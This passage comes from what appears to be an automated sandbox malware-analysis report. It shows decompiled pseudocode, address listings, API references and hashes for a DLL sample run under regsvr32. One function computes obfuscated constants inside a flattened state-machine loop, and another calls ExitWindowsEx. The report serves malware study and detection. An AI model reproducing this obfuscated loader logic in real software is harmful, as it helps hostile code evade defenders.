							E1001FADC(_t77, _t222, _t142 - _t203 + 4);
							_t78 =  &_a52; // 0x1001cdb2
							_t203 =  *_t78;
							_t79 =  &_a48; // 0x100027d0
							_t142 =  *_t79;
						}
						_t143 = _t142 + 4;
						_t242 = _a36 & 0x00000001;
						_a52 = _t143;
						if((_a36 & 0x00000001) == 0) {
							_t84 =  &_a32; // 0x1002f68d
							_push( *_t84);
							_push(4);
							_t143 = E10020287(3, _t222, _t227, _t229, _t242);
						}
						_t85 = _t143 + 4; // 0x4
						_t223 = _t85;
						if(_t85 > _t203) {
							_t86 =  &_a12; // 0x1005695c
							E1001FADC(_t86, _t223, _t143 - _t203 + 4);
							_t87 =  &_a52; // 0x10035bfe
							_t203 =  *_t87;
							_t88 =  &_a48; // 0x10035bfe
							_t143 =  *_t88;
						}
						_t144 = _t143 + 4;
						_t245 = _a36 & 0x00000001;
						_a52 = _t144;
						if((_a36 & 0x00000001) == 0) {
							_t93 =  &_a32; // 0x10001480
							_push( *_t93);
							_push(4);
							_t144 = E10020287(3, _t223, _t227, _t229, _t245);
						}
						_t94 = _t144 + 4; // 0x4
						_t224 = _t94;
						if(_t94 > _t203) {
							_t95 =  &_a12; // 0x10056950
							E1001FADC(_t95, _t224, _t144 - _t203 + 4);
							_t96 =  &_a52; // 0x1002f68d
							_t203 =  *_t96;
							_t97 =  &_a48; // 0x10017ddd
							_t144 =  *_t97;
						}
						_t145 = _t144 + 4;
						_t248 = _a36 & 0x00000001;
						_a52 = _t145;
						if((_a36 & 0x00000001) == 0) {
							_t102 =  &_a32; // 0x10060370
							_push( *_t102);
							_push(4);
							_t145 = E10020287(3, _t224, _t227, _t229, _t248);
						}
						_t103 = _t145 + 4; // 0x4
						_t225 = _t103;
						if(_t103 > _t203) {
							_t104 =  &_a12; // 0x10056944
							E1001FADC(_t104, _t225, _t145 - _t203 + 4);
							_t105 =  &_a52; // 0x10001480
							_t203 =  *_t105;
							_t106 =  &_a48; // 0x10014ca0
							_t145 =  *_t106;
						}
						_t146 = _t145 + 4;
						_t251 = _a36 & 0x00000001;
						_a52 = _t146;
						if((_a36 & 0x00000001) == 0) {
							_t111 =  &_a32; // 0x100025a0
							_push( *_t111);
							_push(4);
							_t146 = E10020287(3, _t225, _t227, _t229, _t251);
						}
						_t112 =  &(_t146[1]); // 0x4
						_t220 = _t112;
						if(_t112 > _t203) {
							_t253 = _t146 - _t203 + 4;
							_t113 =  &_a12; // 0x10056938
							E1001FADC(_t113, _t220, _t146 - _t203 + 4);
							_t114 =  &_a48; // 0x0
							_t146 =  *_t114;
						}
						_t229 =  *_t146;
						_t115 =  &_a12; // 0x10056934
						_a52 =  &(_t146[1]);
						E1001FEB3(_t115, _t253);
						_t117 =  &_v4; // 0x10056924
						E10020580(3, _t117);
						_t254 =  *_t146 - _t231;
						if( *_t146 == _t231) {
							ExitWindowsEx(8, _t231);
						}
						_t118 =  &_a12; // 0x10056980
						_a92 = 3;
						E1002001A(3, _t118, _t220, _t227, _t229, _t254);
					}
					_t120 =  &_a24; // 0x10056970
					_a120 = 0xffffffff;
					E100206EF(3, _t120, _t220, _t227, _t229, _t254);
					_t122 =  &_a112; // 0x1001ca75
					 *[fs:0x0] =  *_t122;
					return 0;
				}
				__eax = E10001000(__ecx, __edx, 0x80004005);
				goto L20;
			}


































                                                                                                                0x1001005e
                                                                                                                0x1001005e
                                                                                                                0x10010060
                                                                                                                0x10010060
                                                                                                                0x10010064
                                                                                                                0x10010069
                                                                                                                0x1001006b
                                                                                                                0x1001006d
                                                                                                                0x10010070
                                                                                                                0x10010072
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010078
                                                                                                                0x1001007a
                                                                                                                0x1001007f
                                                                                                                0x10010081
                                                                                                                0x10010084
                                                                                                                0x10010088
                                                                                                                0x1001008a
                                                                                                                0x10010091
                                                                                                                0x10010284
                                                                                                                0x10010284
                                                                                                                0x00000000
                                                                                                                0x10010097
                                                                                                                0x10010097
                                                                                                                0x1001009a
                                                                                                                0x00000000
                                                                                                                0x100100a0
                                                                                                                0x100100a0
                                                                                                                0x100100a3
                                                                                                                0x100100a6
                                                                                                                0x100100a7
                                                                                                                0x100100ab
                                                                                                                0x100100b0
                                                                                                                0x100100b6
                                                                                                                0x100100bb
                                                                                                                0x100100c1
                                                                                                                0x100100c6
                                                                                                                0x100100c7
                                                                                                                0x100100ca
                                                                                                                0x100100ce
                                                                                                                0x100100d1
                                                                                                                0x100100d6
                                                                                                                0x100100d9
                                                                                                                0x100100dc
                                                                                                                0x100100e0
                                                                                                                0x100100e2
                                                                                                                0x100100ee
                                                                                                                0x100100f8
                                                                                                                0x10010100
                                                                                                                0x10010108
                                                                                                                0x1001010a
                                                                                                                0x1001010d
                                                                                                                0x1001010f
                                                                                                                0x10010111
                                                                                                                0x10010116
                                                                                                                0x1001012a
                                                                                                                0x1001012a
                                                                                                                0x10010132
                                                                                                                0x10010137
                                                                                                                0x1001013c
                                                                                                                0x10010146
                                                                                                                0x10010146
                                                                                                                0x1001014c
                                                                                                                0x10010151
                                                                                                                0x10010155
                                                                                                                0x1001015a
                                                                                                                0x10010164
                                                                                                                0x10010164
                                                                                                                0x1001016a
                                                                                                                0x1001016f
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x1001017b
                                                                                                                0x10010180
                                                                                                                0x10010187
                                                                                                                0x1001018c
                                                                                                                0x1001018e
                                                                                                                0x10010190
                                                                                                                0x10010193
                                                                                                                0x10010195
                                                                                                                0x00000000
                                                                                                                0x1001019b
                                                                                                                0x1001019b
                                                                                                                0x1001019d
                                                                                                                0x100101a2
                                                                                                                0x100101a4
                                                                                                                0x100101a7
                                                                                                                0x100101ab
                                                                                                                0x100101b0
                                                                                                                0x100101b6
                                                                                                                0x100101bc
                                                                                                                0x100101c2
                                                                                                                0x100101c3
                                                                                                                0x100101c5
                                                                                                                0x100101cf
                                                                                                                0x100101d7
                                                                                                                0x100101dc
                                                                                                                0x100101e2
                                                                                                                0x100101ea
                                                                                                                0x100101f0
                                                                                                                0x100101f5
                                                                                                                0x100101f8
                                                                                                                0x10010200
                                                                                                                0x10010200
                                                                                                                0x10010203
                                                                                                                0x10010206
                                                                                                                0x1001020a
                                                                                                                0x1001020b
                                                                                                                0x1001020d
                                                                                                                0x1001020f
                                                                                                                0x10010211
                                                                                                                0x10010217
                                                                                                                0x10010217
                                                                                                                0x10010219
                                                                                                                0x1001021d
                                                                                                                0x10010220
                                                                                                                0x10010228
                                                                                                                0x1001022b
                                                                                                                0x1001022e
                                                                                                                0x10010232
                                                                                                                0x10010233
                                                                                                                0x10010235
                                                                                                                0x10010237
                                                                                                                0x10010239
                                                                                                                0x1001023f
                                                                                                                0x1001023f
                                                                                                                0x10010241
                                                                                                                0x1001024c
                                                                                                                0x1001024f
                                                                                                                0x10010252
                                                                                                                0x10010256
                                                                                                                0x10010257
                                                                                                                0x10010259
                                                                                                                0x1001025b
                                                                                                                0x1001025e
                                                                                                                0x10010260
                                                                                                                0x10010264
                                                                                                                0x10010264
                                                                                                                0x10010266
                                                                                                                0x10010269
                                                                                                                0x1001026b
                                                                                                                0x1001026f
                                                                                                                0x00000000
                                                                                                                0x10010275
                                                                                                                0x10010002
                                                                                                                0x1001000b
                                                                                                                0x10010011
                                                                                                                0x10010017
                                                                                                                0x10010017
                                                                                                                0x1001001e
                                                                                                                0x10010024
                                                                                                                0x10010029
                                                                                                                0x1001002b
                                                                                                                0x10010289
                                                                                                                0x1001028a
                                                                                                                0x1001028f
                                                                                                                0x10010031
                                                                                                                0x10010031
                                                                                                                0x10010032
                                                                                                                0x1001003a
                                                                                                                0x10010041
                                                                                                                0x10010049
                                                                                                                0x1001004e
                                                                                                                0x10010054
                                                                                                                0x10010054
                                                                                                                0x10010292
                                                                                                                0x10010298
                                                                                                                0x100102a9
                                                                                                                0x100102ab
                                                                                                                0x100102ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100102ad
                                                                                                                0x10010011
                                                                                                                0x1001026f
                                                                                                                0x10010195
                                                                                                                0x1001009a
                                                                                                                0x100102b3
                                                                                                                0x100102c0
                                                                                                                0x100102c6
                                                                                                                0x100102df
                                                                                                                0x100102e8
                                                                                                                0x100102ed
                                                                                                                0x100102f3
                                                                                                                0x100102f9
                                                                                                                0x100102ff
                                                                                                                0x10010305
                                                                                                                0x1001030a
                                                                                                                0x10010310
                                                                                                                0x10010321
                                                                                                                0x10010326
                                                                                                                0x10010337
                                                                                                                0x1001033c
                                                                                                                0x1001034a
                                                                                                                0x1001034f
                                                                                                                0x10010360
                                                                                                                0x10010365
                                                                                                                0x10010372
                                                                                                                0x10010377
                                                                                                                0x10010384
                                                                                                                0x10010389
                                                                                                                0x1001038d
                                                                                                                0x10010392
                                                                                                                0x10010393
                                                                                                                0x1001039a
                                                                                                                0x1001039f
                                                                                                                0x100103a3
                                                                                                                0x100103aa
                                                                                                                0x100103af
                                                                                                                0x100103b1
                                                                                                                0x100103b7
                                                                                                                0x100103bb
                                                                                                                0x100103c5
                                                                                                                0x100103c7
                                                                                                                0x100103c8
                                                                                                                0x100103cd
                                                                                                                0x100103cf
                                                                                                                0x100103d4
                                                                                                                0x100103d8
                                                                                                                0x100103dd
                                                                                                                0x100103e2
                                                                                                                0x100103ea
                                                                                                                0x100103ec
                                                                                                                0x100103f0
                                                                                                                0x100103f1
                                                                                                                0x100103f3
                                                                                                                0x100103f3
                                                                                                                0x100103f8
                                                                                                                0x100103f8
                                                                                                                0x100103fc
                                                                                                                0x100103fc
                                                                                                                0x10010400
                                                                                                                0x10010400
                                                                                                                0x10010405
                                                                                                                0x1001040d
                                                                                                                0x10010411
                                                                                                                0x10010416
                                                                                                                0x10010416
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041e
                                                                                                                0x10010421
                                                                                                                0x10010426
                                                                                                                0x1001042a
                                                                                                                0x1001042c
                                                                                                                0x10010430
                                                                                                                0x10010431
                                                                                                                0x10010433
                                                                                                                0x10010433
                                                                                                                0x10010438
                                                                                                                0x10010438
                                                                                                                0x1001043d
                                                                                                                0x10010445
                                                                                                                0x10010449
                                                                                                                0x1001044e
                                                                                                                0x1001044e
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010456
                                                                                                                0x10010459
                                                                                                                0x1001045e
                                                                                                                0x10010462
                                                                                                                0x10010464
                                                                                                                0x10010468
                                                                                                                0x10010469
                                                                                                                0x1001046b
                                                                                                                0x1001046b
                                                                                                                0x10010470
                                                                                                                0x10010470
                                                                                                                0x10010475
                                                                                                                0x1001047d
                                                                                                                0x10010481
                                                                                                                0x10010486
                                                                                                                0x10010486
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048e
                                                                                                                0x10010491
                                                                                                                0x10010496
                                                                                                                0x1001049a
                                                                                                                0x1001049c
                                                                                                                0x100104a0
                                                                                                                0x100104a1
                                                                                                                0x100104a3
                                                                                                                0x100104a3
                                                                                                                0x100104a8
                                                                                                                0x100104a8
                                                                                                                0x100104ad
                                                                                                                0x100104b5
                                                                                                                0x100104b9
                                                                                                                0x100104be
                                                                                                                0x100104be
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c6
                                                                                                                0x100104c9
                                                                                                                0x100104ce
                                                                                                                0x100104d2
                                                                                                                0x100104d4
                                                                                                                0x100104d8
                                                                                                                0x100104d9
                                                                                                                0x100104db
                                                                                                                0x100104db
                                                                                                                0x100104e0
                                                                                                                0x100104e0
                                                                                                                0x100104e5
                                                                                                                0x100104e9
                                                                                                                0x100104ed
                                                                                                                0x100104f1
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104fa
                                                                                                                0x100104ff
                                                                                                                0x10010503
                                                                                                                0x10010507
                                                                                                                0x1001050c
                                                                                                                0x10010510
                                                                                                                0x10010515
                                                                                                                0x10010517
                                                                                                                0x1001051c
                                                                                                                0x1001051c
                                                                                                                0x10010522
                                                                                                                0x10010526
                                                                                                                0x1001052d
                                                                                                                0x1001052d
                                                                                                                0x10010532
                                                                                                                0x10010536
                                                                                                                0x10010541
                                                                                                                0x10010548
                                                                                                                0x1001054f
                                                                                                                0x1001055e
                                                                                                                0x1001055e
                                                                                                                0x1001027f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100102A7
                                                                                                                • TerminateThread.KERNEL32(?,00000000,DF7C0CDA), ref: 100102C0
                                                                                                                • SendMessageA.USER32 ref: 100102DF
                                                                                                                • ExitWindowsEx.USER32(00000008,00000000), ref: 1001051C
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                  • Part of subcall function 1003BD06: __mbscmp_l.LIBCMT ref: 1003BD10
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                  • Part of subcall function 1002637C: SendMessageA.USER32 ref: 1002639D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ExitTerminateThreadWindowWindows__mbscmp_l
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3643140477-908802073
                                                                                                                • Opcode ID: da9b098861b42dcb7b3c0e4e5e6ea2826502a9b463fde0e3635a1d817de97ba1
                                                                                                                • Instruction ID: c31bd651603e65f7edcd71fbcebb0dfd6ac57d96a755493a4ff4c0ef553417ba
                                                                                                                • Opcode Fuzzy Hash: da9b098861b42dcb7b3c0e4e5e6ea2826502a9b463fde0e3635a1d817de97ba1
                                                                                                                • Instruction Fuzzy Hash: 55E18B752043419FE304DB54CD95FAA77E6FB84318F44892CF5858B292DBB0F985CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B6D0 Relevance: 9.1, APIs: 6, Instructions: 74windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E1000B6D0(void* __ecx, void* __ebp) {
				signed int _v4;
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				int _t20;
				void* _t21;
				int _t25;
				int _t26;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				signed int _t67;

				_t67 =  &(_v108.top);
				_t17 =  *0x1006dbdc; // 0xdf7c0cda
				_v4 = _t17 ^ _t67;
				_t65 = __ecx;
				_t20 = IsIconic( *(__ecx + 0x20));
				_t68 = _t20;
				if(_t20 == 0) {
					_t21 = E10020CCF(_t45, _t65, _t61, _t65, __eflags);
					__eflags = _v4 ^ _t67;
					return E1003B437(_t21, _t45, _v4 ^ _t67, _t58, _t61, _t65);
				} else {
					_push(_t45);
					E100246DF(_t45,  &_v88, _t61, _t65, _t68);
					SendMessageA( *(_t65 + 0x20), 0x27, _v88, 0);
					_t25 = GetSystemMetrics(0xb);
					_t26 = GetSystemMetrics(0xc);
					GetClientRect( *(_t65 + 0x20),  &_v108);
					_t60 =  *(_t65 + 0x7dc);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t25 + 1 -  *(_t65 + 0x7dc) >> 1, _v108.bottom - _v108.top - _t26 + 1 -  *(_t65 + 0x7dc) >> 1, _t60);
					_t43 = E10024733(_t25,  &_v92, _t26, _t65, _t68);
					_t64 = _t65;
					_t47 = _t61;
					return E1003B437(_t43, _t47, _v8 ^ _t67, _t60, _t64, _t65);
				}
			}
























                                                                                                                0x1000b6d0
                                                                                                                0x1000b6d3
                                                                                                                0x1000b6da
                                                                                                                0x1000b6df
                                                                                                                0x1000b6e5
                                                                                                                0x1000b6eb
                                                                                                                0x1000b6ed
                                                                                                                0x1000b788
                                                                                                                0x1000b792
                                                                                                                0x1000b79c
                                                                                                                0x1000b6f3
                                                                                                                0x1000b6f3
                                                                                                                0x1000b6fa
                                                                                                                0x1000b70c
                                                                                                                0x1000b71a
                                                                                                                0x1000b720
                                                                                                                0x1000b72d
                                                                                                                0x1000b73b
                                                                                                                0x1000b747
                                                                                                                0x1000b75a
                                                                                                                0x1000b765
                                                                                                                0x1000b76f
                                                                                                                0x1000b774
                                                                                                                0x1000b775
                                                                                                                0x1000b785
                                                                                                                0x1000b785

                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 1000B6E5
                                                                                                                  • Part of subcall function 100246DF: __EH_prolog3.LIBCMT ref: 100246E6
                                                                                                                  • Part of subcall function 100246DF: BeginPaint.USER32(?,?), ref: 10024712
                                                                                                                • SendMessageA.USER32 ref: 1000B70C
                                                                                                                • GetSystemMetrics.USER32 ref: 1000B71A
                                                                                                                • GetSystemMetrics.USER32 ref: 1000B720
                                                                                                                • GetClientRect.USER32 ref: 1000B72D
                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 1000B765
                                                                                                                  • Part of subcall function 10024733: __EH_prolog3.LIBCMT ref: 1002473A
                                                                                                                  • Part of subcall function 10024733: EndPaint.USER32(?,?), ref: 10024755
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2914073315-0
                                                                                                                • Opcode ID: b5294d1bd409c8458774b6e8a906c1978f2e357e8a3c9c5a38e7f1882f681795
                                                                                                                • Instruction ID: c09878a863cf53de5ad18f968702e5e3749ae34195064ec774b844a3ca483362
                                                                                                                • Opcode Fuzzy Hash: b5294d1bd409c8458774b6e8a906c1978f2e357e8a3c9c5a38e7f1882f681795
                                                                                                                • Instruction Fuzzy Hash: EE2138762047019FD714DF78DC8AE6B77EAFB88200F454A09F589C7284DA24E8048A52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A71E3 Relevance: 9.0, Strings: 7, Instructions: 261COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001A71E3(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t278;
				signed int _t302;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				void* _t312;
				void* _t339;
				intOrPtr _t340;
				signed int* _t343;

				_push(_a28);
				_t339 = __edx;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(0);
				_t278 = E001AC98A(0);
				_v72 = _t278;
				_t343 =  &(( &_v188)[9]);
				_v136 = 0x7a0c61;
				_t340 = _t278;
				_v136 = _v136 ^ 0xa476c4b6;
				_v136 = _v136 ^ 0x7f31ef9b;
				_t312 = 0xa433ec5;
				_v136 = _v136 ^ 0xdb3d234c;
				_v148 = 0xda6be4;
				_v148 = _v148 | 0xce70a5d4;
				_v148 = _v148 + 0x6c5d;
				_v148 = _v148 ^ 0xcefb5c71;
				_v140 = 0x731c8b;
				_v140 = _v140 << 0xe;
				_v140 = _v140 >> 1;
				_v140 = _v140 ^ 0x639371ab;
				_v180 = 0x893c1;
				_v180 = _v180 + 0xe5dc;
				_v180 = _v180 + 0xffff42f5;
				_v180 = _v180 >> 1;
				_v180 = _v180 ^ 0x0001e28a;
				_v156 = 0xa30290;
				_t305 = 0x4e;
				_v156 = _v156 / _t305;
				_v156 = _v156 + 0xffffc5c7;
				_v156 = _v156 + 0x431e;
				_v156 = _v156 ^ 0x000277f0;
				_v144 = 0xe35d8c;
				_v144 = _v144 ^ 0x27fc3cba;
				_t306 = 0x7a;
				_v144 = _v144 * 0x4e;
				_v144 = _v144 ^ 0xeb80c3fe;
				_v76 = 0xf32743;
				_v76 = _v76 | 0xf99a28d0;
				_v76 = _v76 ^ 0xf9f75051;
				_v124 = 0xf9648a;
				_v124 = _v124 / _t306;
				_v124 = _v124 ^ 0xe87cc025;
				_v124 = _v124 ^ 0xe876b4a5;
				_v108 = 0x361314;
				_v108 = _v108 + 0xffff50f6;
				_v108 = _v108 ^ 0x0038a8eb;
				_v132 = 0xe9406f;
				_t80 =  &_v132; // 0xe9406f
				_t307 = 0x17;
				_v132 =  *_t80 / _t307;
				_v132 = _v132 * 0x7e;
				_v132 = _v132 ^ 0x04f12271;
				_v80 = 0xd4f1cf;
				_v80 = _v80 + 0x8964;
				_v80 = _v80 ^ 0x00d47933;
				_v164 = 0xa26b3;
				_v164 = _v164 + 0xec01;
				_v164 = _v164 << 4;
				_v164 = _v164 | 0x3475bd9e;
				_v164 = _v164 ^ 0x34fb0d19;
				_v96 = 0x624455;
				_v96 = _v96 + 0xffffc667;
				_v96 = _v96 ^ 0x0067123a;
				_v168 = 0x4017b4;
				_v168 = _v168 + 0x33fb;
				_v168 = _v168 ^ 0xbefdc35f;
				_v168 = _v168 + 0x104b;
				_v168 = _v168 ^ 0xbeb0c8ee;
				_v176 = 0xef39e8;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x46c6;
				_v176 = _v176 << 3;
				_v176 = _v176 ^ 0x001031bb;
				_v100 = 0x527242;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 ^ 0x0003c6bf;
				_v184 = 0xf87c35;
				_v184 = _v184 ^ 0x4f0be4af;
				_v184 = _v184 | 0x88219044;
				_t308 = 0x12;
				_v184 = _v184 / _t308;
				_v184 = _v184 ^ 0x0b837421;
				_v188 = 0x6609a3;
				_v188 = _v188 + 0xffff27b2;
				_v188 = _v188 + 0xffffe934;
				_v188 = _v188 << 5;
				_v188 = _v188 ^ 0x0caf2d86;
				_v128 = 0x23974d;
				_v128 = _v128 ^ 0x14b31f9a;
				_t309 = 0x68;
				_v128 = _v128 / _t309;
				_v128 = _v128 ^ 0x003d2987;
				_v104 = 0x26c933;
				_v104 = _v104 + 0xffff5977;
				_v104 = _v104 ^ 0x002283ea;
				_v116 = 0xdfcf2f;
				_v116 = _v116 ^ 0xe376d356;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0x1d47d51b;
				_v172 = 0x35999a;
				_v172 = _v172 ^ 0xff2b297f;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 | 0xa38aa7d7;
				_v172 = _v172 ^ 0xa38b9b15;
				_v88 = 0xbf825c;
				_v88 = _v88 << 0xf;
				_v88 = _v88 ^ 0xc1276f63;
				_v152 = 0x108f7a;
				_v152 = _v152 + 0xffff32d6;
				_v152 = _v152 + 0xffffb35f;
				_t310 = 0x7b;
				_v152 = _v152 / _t310;
				_v152 = _v152 ^ 0x0000a3b8;
				_v160 = 0xc46e48;
				_v160 = _v160 + 0xffffa311;
				_v160 = _v160 ^ 0x724e5849;
				_v160 = _v160 + 0x85d9;
				_v160 = _v160 ^ 0x72860fd9;
				_v112 = 0x6f0466;
				_v112 = _v112 + 0xffff767f;
				_v112 = _v112 ^ 0x6bb1e2ba;
				_v112 = _v112 ^ 0x6bd60be8;
				_v120 = 0x115719;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0x2b2b6280;
				_v120 = _v120 ^ 0x2b08d458;
				_v84 = 0x468437;
				_v84 = _v84 | 0x5b37428e;
				_v84 = _v84 ^ 0x5b73edda;
				_v92 = 0xdec2c2;
				_v92 = _v92 | 0x58c7ad75;
				_v92 = _v92 ^ 0x58df3aa7;
				do {
					while(_t312 != 0x2f0571) {
						if(_t312 == 0x1f67348) {
							_push(_t312);
							_t302 = E001C22F2(_v140, _a28, _v180,  &_v72, _v156, _v144);
							_t343 =  &(_t343[5]);
							__eflags = _t302;
							if(_t302 != 0) {
								_t312 = 0x2f0571;
								continue;
							}
						} else {
							if(_t312 == 0x8881ed1) {
								E001B8E1D(_v72, _v84, _v92);
							} else {
								if(_t312 != 0xa433ec5) {
									goto L9;
								} else {
									_t312 = 0x1f67348;
									continue;
								}
							}
						}
						L12:
						return _t340;
					}
					E001B25CD(_v76, _v124, 0x44, _v108,  &_v68);
					_push(_v96);
					_v68 = 0x44;
					_push(0x1a1268);
					_push(_v164);
					_t314 = _v132;
					_v60 = E001BF5D9(_v132, _v80, __eflags);
					__eflags = _v148 | _v136;
					_t340 = E001B23C7(_v168, _v176, _v100, _v184, _v188, _v72,  &_v68, _v128, _v148 | _v136, _v132, _v132, _v104, _t314, _a28, _v116, _v172, 0, _a20, _t339, _t314, _v88);
					E001BF94B(_v60, _v152, _v160, _v112, _v120);
					_t343 =  &(_t343[0x1c]);
					_t312 = 0x8881ed1;
					L9:
					__eflags = _t312 - 0x8f0d87;
				} while (_t312 != 0x8f0d87);
				goto L12;
			}















































                                                                                                                0x001a71ed
                                                                                                                0x001a71f6
                                                                                                                0x001a71f8
                                                                                                                0x001a71ff
                                                                                                                0x001a7206
                                                                                                                0x001a720d
                                                                                                                0x001a7214
                                                                                                                0x001a7215
                                                                                                                0x001a721c
                                                                                                                0x001a721d
                                                                                                                0x001a721e
                                                                                                                0x001a7223
                                                                                                                0x001a722a
                                                                                                                0x001a722d
                                                                                                                0x001a7235
                                                                                                                0x001a7237
                                                                                                                0x001a7241
                                                                                                                0x001a7249
                                                                                                                0x001a724e
                                                                                                                0x001a7256
                                                                                                                0x001a725e
                                                                                                                0x001a7266
                                                                                                                0x001a726e
                                                                                                                0x001a7276
                                                                                                                0x001a727e
                                                                                                                0x001a7283
                                                                                                                0x001a7287
                                                                                                                0x001a728f
                                                                                                                0x001a7297
                                                                                                                0x001a729f
                                                                                                                0x001a72a7
                                                                                                                0x001a72ab
                                                                                                                0x001a72b3
                                                                                                                0x001a72c1
                                                                                                                0x001a72c6
                                                                                                                0x001a72cc
                                                                                                                0x001a72d4
                                                                                                                0x001a72dc
                                                                                                                0x001a72e4
                                                                                                                0x001a72ec
                                                                                                                0x001a72f9
                                                                                                                0x001a72fc
                                                                                                                0x001a7300
                                                                                                                0x001a7308
                                                                                                                0x001a7313
                                                                                                                0x001a731e
                                                                                                                0x001a7329
                                                                                                                0x001a7339
                                                                                                                0x001a733d
                                                                                                                0x001a7345
                                                                                                                0x001a734d
                                                                                                                0x001a7355
                                                                                                                0x001a735d
                                                                                                                0x001a7365
                                                                                                                0x001a736d
                                                                                                                0x001a7371
                                                                                                                0x001a7374
                                                                                                                0x001a737d
                                                                                                                0x001a7381
                                                                                                                0x001a7389
                                                                                                                0x001a7391
                                                                                                                0x001a7399
                                                                                                                0x001a73a1
                                                                                                                0x001a73a9
                                                                                                                0x001a73b3
                                                                                                                0x001a73b8
                                                                                                                0x001a73c0
                                                                                                                0x001a73c8
                                                                                                                0x001a73d0
                                                                                                                0x001a73d8
                                                                                                                0x001a73e0
                                                                                                                0x001a73e8
                                                                                                                0x001a73f0
                                                                                                                0x001a73f8
                                                                                                                0x001a7400
                                                                                                                0x001a7408
                                                                                                                0x001a7410
                                                                                                                0x001a7415
                                                                                                                0x001a741d
                                                                                                                0x001a7422
                                                                                                                0x001a742a
                                                                                                                0x001a7432
                                                                                                                0x001a7437
                                                                                                                0x001a743f
                                                                                                                0x001a7447
                                                                                                                0x001a744f
                                                                                                                0x001a745d
                                                                                                                0x001a7462
                                                                                                                0x001a7468
                                                                                                                0x001a7470
                                                                                                                0x001a7478
                                                                                                                0x001a7480
                                                                                                                0x001a7488
                                                                                                                0x001a748d
                                                                                                                0x001a7495
                                                                                                                0x001a749d
                                                                                                                0x001a74a9
                                                                                                                0x001a74ae
                                                                                                                0x001a74b4
                                                                                                                0x001a74bc
